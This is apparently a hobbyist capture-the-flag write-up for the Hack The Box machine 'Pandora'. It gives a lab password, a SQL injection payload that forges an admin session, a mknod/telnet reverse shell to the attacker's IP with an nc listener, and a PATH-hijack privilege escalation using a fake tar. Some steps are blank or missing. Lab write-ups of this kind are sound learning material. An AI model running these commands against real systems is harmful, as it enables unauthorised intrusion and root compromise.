Write Up for the easy box Pandora
This one was done mostly by my friend Phil, he got the foothold and user flag down, I just did the priv esc (it was pretty easy). So I'll just list out the steps to getting a foothold rather than my thought process.
Add pandora.htb to /etc/hosts
ssh -L 8000:localhost:80 daniel@pandora.htb
password is HotelBabylon23 (thx phil)
On the host machine, go to
Next is a SQL injection.
In a new tab, go to:' union SELECT 1,2,'id_usuario|s:5:"admin";' as data -- SgGO
Refresh the tab, and you should be logged in as admin.
Next, use this python script to RCE with the admin cookie:
This part was really glitchy, so dont screw up the first run of the script, else you might have to change HTB servers.
In a new terminal tab, open a netcat listener with
nc -lvnp 4444
On the RCE terminal, paste in
mknod backpipe p; telnet $IP 4444 0<backpipe | /bin/bash 1>backpipe
and make sure to change the $IP to your local OpenVPN IP.
Now to upgrade the shell use
python3 -c 'import pty; pty.spawn("/bin/bash")'
The shell is still kinda stupid, so if you can manage to get an ssh session going with authorized_keys or id_rsa, use that
cd /home/matt
cat user.txt
Privilege Escalation
Now with a nice foothold, we gotta get the juicy root flag.
After running down all the priv esc techniques (using my checklist), I found the suid execs with
find / -type f -a ( -perm -u+s -o -perm -g+s ) -exec ls -l {} ; 2> /dev/null
and found something called pandora_backup
Interesting...Thats probably our priv esc vector.
I ran pandora_backup and it said I lacked the privs to backup.
I still wanted to know what it did so I ran
ltrace pandora_backup
and it seemed it was running tar as system. Looks like this is definitely the priv esc vector.
The PATH variable is writeable so I'll just trick the system into running a fake tar file.
echo "/bin/bash" > /home/matt/tar
export PATH=/home/matt:$PATH
You can do a sanity check to make sure its calling the right tar (the one we just made) with
which tar
It should say /home/matt/tar
finally just run
and huzzah! root!
cat /root/root.txt
shoutouts to phil 'filmore' mor